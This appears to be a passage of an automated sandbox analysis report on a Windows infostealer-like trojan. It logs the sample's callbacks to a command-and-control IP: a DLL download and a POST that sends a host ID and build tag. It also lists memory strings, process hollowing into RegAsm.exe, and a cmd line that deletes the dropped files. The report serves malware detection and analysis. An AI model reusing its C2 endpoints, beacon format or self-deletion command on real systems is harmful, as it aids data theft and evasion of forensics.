------JJKFBAKFBGDHIEBGDAKFContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>------JJKFBAKFBGDHIEBGDAKFContent-Disposition: form-data; name="message"------JJKFBAKFBGDHIEBGDAKF--

Source: Joe Sandbox View

ASN Name: ENZUINC-US ENZUINC-US

Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134

Source: global traffic

HTTP traffic detected: GET /84bad7132df89fd7/sqlite3.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache

Source: unknown

HTTP traffic detected: POST /c73eed764cc59dcb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCGHost: 23.88.106.134Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 42 45 35 43 37 30 39 44 33 31 32 32 30 34 30 34 30 39 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 67 6f 79 64 61 31 34 38 38 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 2d 2d 0d 0a Data Ascii: ------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="hwid"5BE5C709D3122040409402------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="build"goyda1488------HDGCFHIDAKECFHIEBFCG--

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 May 2024 12:53:00 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 May 2024 12:53:01 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 May 2024 12:53:01 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 May 2024 12:53:01 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 May 2024 12:53:01 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 May 2024 12:53:02 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 May 2024 12:53:02 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 May 2024 12:53:02 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>

Source: RegAsm.exe, 00000001.00000002.2034961312.000000000106A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134
Source: RegAsm.exe, 00000001.00000002.2034339347.0000000000439000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2034961312.00000000010C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/84bad7132df89fd7/sqlite3.dll
Source: RegAsm.exe, 00000001.00000002.2034339347.0000000000435000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2034339347.0000000000440000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2034339347.000000000054D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/c73eed764cc59dcb.php
Source: RegAsm.exe, 00000001.00000002.2034339347.0000000000550000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2034339347.000000000054D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/c73eed764cc59dcb.php.0//EN
Source: RegAsm.exe, 00000001.00000002.2034339347.0000000000440000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/c73eed764cc59dcb.phpininit.exe
Source: RegAsm.exe, 00000001.00000002.2034961312.00000000010C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/c73eed764cc59dcb.phpxKr
Source: Amcache.hve.8.dr	String found in binary or memory: http://upx.sf.net

Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_004F41F4	0_2_004F41F4
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_004E0250	0_2_004E0250
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_004F2316	0_2_004F2316
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_00512549	0_2_00512549
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_004F265E	0_2_004F265E
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_004F4615	0_2_004F4615
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_004CA690	0_2_004CA690
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_004E0690	0_2_004E0690
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_00516790	0_2_00516790
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_004FC846	0_2_004FC846
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_004F29B5	0_2_004F29B5
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_004F4A45	0_2_004F4A45
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_004F2CFD	0_2_004F2CFD
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_004F308B	0_2_004F308B
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_004DD17E	0_2_004DD17E
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_004AD1A0	0_2_004AD1A0
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_0050B28F	0_2_0050B28F
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_004F3428	0_2_004F3428
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_004F37B6	0_2_004F37B6
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_004CFA54	0_2_004CFA54
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_00517ABC	0_2_00517ABC
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_004F3B1B	0_2_004F3B1B
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_004DDC51	0_2_004DDC51
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_004DFCD0	0_2_004DFCD0
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_0050BC81	0_2_0050BC81
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_004F3E8F	0_2_004F3E8F

Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: String function: 004D8C87 appears 42 times
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: String function: 00505231 appears 54 times
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: String function: 004C7E91 appears 126 times
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: String function: 004C7EC4 appears 82 times
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: String function: 004C8F20 appears 78 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004043B0 appears 316 times

Source: C:\Users\user\Desktop\w7kdnBzGat.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 268

Source: w7kdnBzGat.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@9/5@0/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_00414DD0 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,

1_2_00414DD0

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6656:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4288

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\d0b8e8ef-617b-4fec-bb53-0a4fbc673daa

Jump to behavior

Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Command line argument: SVWj@h	0_2_005222C6
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Command line argument: SVWj@h	0_2_005222C6
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Command line argument: SVWj@h	0_2_005222C6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\w7kdnBzGat.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: w7kdnBzGat.exe	ReversingLabs: Detection: 63%
Source: w7kdnBzGat.exe	Virustotal: Detection: 50%

Source: RegAsm.exe	String found in binary or memory: <address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address> </body></html> ------JJKFBAKFBGDHIEBGDAKF
Source: RegAsm.exe	String found in binary or memory: <address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address> </body></html>
Source: RegAsm.exe	String found in binary or memory: <address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address> </body></html> ------
Source: RegAsm.exe	String found in binary or memory: <address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address> </body></html> ------JJKFBAKFBGDHIEBGDAKF

Source: unknown	Process created: C:\Users\user\Desktop\w7kdnBzGat.exe "C:\Users\user\Desktop\w7kdnBzGat.exe"
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 268
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5	Jump to behavior

Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
